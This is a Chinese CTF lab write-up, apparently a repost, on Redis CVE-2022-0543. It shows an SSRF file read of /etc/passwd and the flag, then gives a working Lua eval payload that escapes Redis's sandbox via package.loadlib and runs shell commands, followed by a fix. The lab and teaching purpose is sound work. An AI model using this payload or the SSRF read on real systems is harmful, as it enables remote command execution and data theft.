春秋云境:CVE-2022-0543(Redis 沙盒逃逸漏洞)

这篇具有很好参考价值的文章主要介绍了春秋云境:CVE-2022-0543(Redis 沙盒逃逸漏洞)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

一、i春秋题目

二、CVE-2022-0543:(redis沙盒逃逸)

漏洞介绍:

漏洞复现:


一、i春秋题目

春秋云境:CVE-2022-0543(Redis 沙盒逃逸漏洞),i春秋,安全,web安全,网络安全,redis,linux

靶标介绍:

Redis 存在代码注入漏洞,攻击者可利用该漏洞远程执行代码。

进入题目:

春秋云境:CVE-2022-0543(Redis 沙盒逃逸漏洞),i春秋,安全,web安全,网络安全,redis,linux

 SSRF漏洞:

后面加上题目给定的网站试试:

春秋云境:CVE-2022-0543(Redis 沙盒逃逸漏洞),i春秋,安全,web安全,网络安全,redis,linux

 可以跳转到百度页面:

春秋云境:CVE-2022-0543(Redis 沙盒逃逸漏洞),i春秋,安全,web安全,网络安全,redis,linux

 读取系统文件:IP/?url=file:///etc/passwd 

春秋云境:CVE-2022-0543(Redis 沙盒逃逸漏洞),i春秋,安全,web安全,网络安全,redis,linux

获取到flag /?url=file:///flag

春秋云境:CVE-2022-0543(Redis 沙盒逃逸漏洞),i春秋,安全,web安全,网络安全,redis,linux

 flag{e30bd2d5-b4e8-4635-858f-5aac6604cd9c}

二、CVE-2022-0543:(redis沙盒逃逸)

漏洞介绍:

        Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。

Redis 存在代码注入漏洞,攻击者可利用该漏洞远程执行代码。

漏洞复现:

靶机
使用vulhub靶场: 

使用vulhub靶场

安装完成后我们进入到对应目录:

cd vulhub/redis/CVE-2022-0543/

然后执行命令,进行靶场编译和运行

docker-compose build
docker-compose up -d
运行完docker-compose后,打开我们的redis就是我们的漏洞环境了

春秋云境:CVE-2022-0543(Redis 沙盒逃逸漏洞),i春秋,安全,web安全,网络安全,redis,linux

先安装redis-cli:

kali安装redis-cli:

apt-get update && apt-get upgrade  (更新源)

apt install redis-tools

春秋云境:CVE-2022-0543(Redis 沙盒逃逸漏洞),i春秋,安全,web安全,网络安全,redis,linux

 redis-cli:

redis-cli -h 192.168.184.177//有漏洞IP

春秋云境:CVE-2022-0543(Redis 沙盒逃逸漏洞),i春秋,安全,web安全,网络安全,redis,linux

产生原因:

        该漏洞的存在是因为Debian/Ubuntu中的Lua库是作为动态库提供的。自动填充了一个package变量,该变量又允许访问任意 Lua 功能。

        我们借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。在Lua中执行这个导出函数,即可获得io库,再使用其执行命令:

local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io");

local io = io_l();

local f = io.popen("id", "r");

local res = f:read("*a");

f:close();

return res


Payload: (执行命令id可以改变)

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

 id命令:

春秋云境:CVE-2022-0543(Redis 沙盒逃逸漏洞),i春秋,安全,web安全,网络安全,redis,linux

 whoami    pwd   ls  春秋云境:CVE-2022-0543(Redis 沙盒逃逸漏洞),i春秋,安全,web安全,网络安全,redis,linux

 到这我们就可以执行命令了。

正式修复方案:Lua 初始化的末尾添加package=nil 

临时修复方案:关闭服务文章来源地址https://www.toymoban.com/news/detail-671562.html

到了这里,关于春秋云境:CVE-2022-0543(Redis 沙盒逃逸漏洞)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 春秋云境:CVE-2022-24124

    文章合集 :春秋云境系列靶场记录(合集) 漏洞介绍 Casdoor是开源的一个身份和访问管理 (IAM) / 单点登录 (SSO) 平台,带有支持 OAuth 2.0 / OIDC 和 SAML 身份验证的 Web UI 。 Casdoor 1.13.1 之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。 解题步骤 题外话 这个题

    2024年02月01日
    浏览(40)
  • 春秋云境:CVE-2022-26965

    文章合集 :春秋云境系列靶场记录(合集) 漏洞介绍 Pluck-CMS-Pluck-4.7.16 后台RCE 解题步骤 过弱口令登录:admin 登录之后按照图中位置进行主题安装 按照这位大哥文章: https://blog.csdn.net/weixin_39639260/article/details/116105945 中说的,需要将主题中的info.php文件修改,再打包成zip再上

    2024年02月04日
    浏览(52)
  • 【春秋云境】CVE-2022-30887

    标靶介绍: 多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任

    2024年02月16日
    浏览(38)
  • 春秋云境:CVE-2022-24112

    文章合集 :春秋云境系列靶场记录(合集) 漏洞介绍 Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX中存在远程代码执行漏洞,该漏洞源于

    2024年02月06日
    浏览(42)
  • 【春秋云境】CVE-2022-32991

    靶标介绍: ​ 该CMS的welcome.php中存在SQL注入攻击 介绍中就很明显提示了welcome.php中存在SQL注入,那么就直接访问。但是要先登录,我们直接注册一个进去。 注册完登录进去就发现有问题: 根据CVE官方: ​ 在 welcome.php ,发现基于 Web 的测验系统 v1.0 通过 eid 参数 包含一个

    2024年02月12日
    浏览(36)
  • 春秋云境:CVE-2022-28525

    文章合集 :春秋云境系列靶场记录(合集) 漏洞介绍 ED01-CMS v20180505 存在任意文件上传漏洞 解题步骤 访问URL 通过弱口令进行登录:admin/admin 登录后在图中位置点击进行图片更新,需要将密码等都写上 抓包将图片信息进行替换,并修改文件名 上传成功后访问上传的shell并执

    2024年02月11日
    浏览(56)
  • 春秋云境:CVE-2022-32991(SQL注入)

    一.i春秋  二.手工注入 三.sqlmap注入 1.sqlmap注入---文件.txt 2.sqlmap--参数 附:sql注入命令 靶标介绍: 该CMS的welcome.php中存在SQL注入攻击。 打开是一个登录注册页面:  点击登录:url看着也没有sql注入 随意输入邮箱和密码:  并用bp抓包  回显用户名或者密码错误: 考虑到要找

    2024年02月06日
    浏览(40)
  • Docker Dirtypipe(CVE-2022-0847)漏洞复现与分析容器逃逸

    同脏牛,通过写只读内存,对映射的内存做篡改 GitHub - greenhandatsjtu/CVE-2022-0847-Container-Escape: CVE-2022-0847 used to achieve container escape 利用CVE-2022-0847 (Dirty Pipe) 实现容器逃逸 云原生之容器安全实践-安全客 - 安全资讯平台 (anquanke.com) 从脏管道(CVE-2022-0847)到docker逃逸 - 先知社区 (aliy

    2024年02月13日
    浏览(57)
  • [春秋云镜wp]CVE-2022-28060 CVE-2022-26201 Victor CMS v1.0存在sql注入漏洞复现拿flag

     访问题目提示的login.php,登录框登录抓包,保存为2.txt,sqlmap跑起来 时间3分钟左右,自己手动输入Y后回车,跑完根据提示打开文件夹,拿到flag  动下小手来个赞吧~~~  和上面同类型,点击首页上面banner的admin,未授权直接进入,找到如图的注入点   抓包,保存为3.txt,s

    2024年02月11日
    浏览(54)
  • 春秋云镜 CVE-2022-24124

    Casdoor是开源的一个身份和访问管理(IAM)/单点登录(SSO)平台,标记支持OAuth 2.0 / OIDC和SAML身份验证的Web UI。 Casdoor 1.13.1之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。 网上poc,获取版本号 /api/get-organizations?p=123pageSize=123value=cfxsortField=sortOrder=field=upd

    2024年02月13日
    浏览(35)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包